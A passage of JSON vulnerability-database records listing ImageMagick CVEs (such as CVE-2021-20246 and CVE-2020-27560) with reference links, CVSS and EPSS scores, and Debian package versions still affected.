"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730604", "reference_id": "1730604", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730604" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931457", "reference_id": "931457", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931457" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13295" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "4.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7yur-twpa-n3e1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80603?format=api", "vulnerability_id": "VCID-834e-c7gn-afac", "summary": "ImageMagick: Division by zero in ScaleResampleFilter in MagickCore/resample.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20246.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20246.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20246", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52345", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52428", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52496", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52481", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.5239", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52418", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52383", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52436", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52431", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52482", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.52467", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.5245", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0029", "scoring_system": "epss", "scoring_elements": "0.5249", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20246" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20246", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20246" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928941", "reference_id": "1928941", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928941" }, { "reference_url": "https://security.archlinux.org/AVG-1579", "reference_id": "AVG-1579", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1579" }, { "reference_url": "https://usn.ubuntu.com/5158-1/", "reference_id": "USN-5158-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5158-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20246" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-834e-c7gn-afac" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80847?format=api", "vulnerability_id": "VCID-8yfc-gunh-17a2", "summary": "ImageMagick: division by zero in OptimizeLayerFrames function in MagickCore/layer.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27560.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27560.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27560", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32132", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32262", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32299", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32124", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32173", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.322", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32204", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32166", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32133", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32168", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32146", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.3212", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.31958", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27560" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27560", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27560" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1890687", "reference_id": "1890687", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1890687" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=972797", 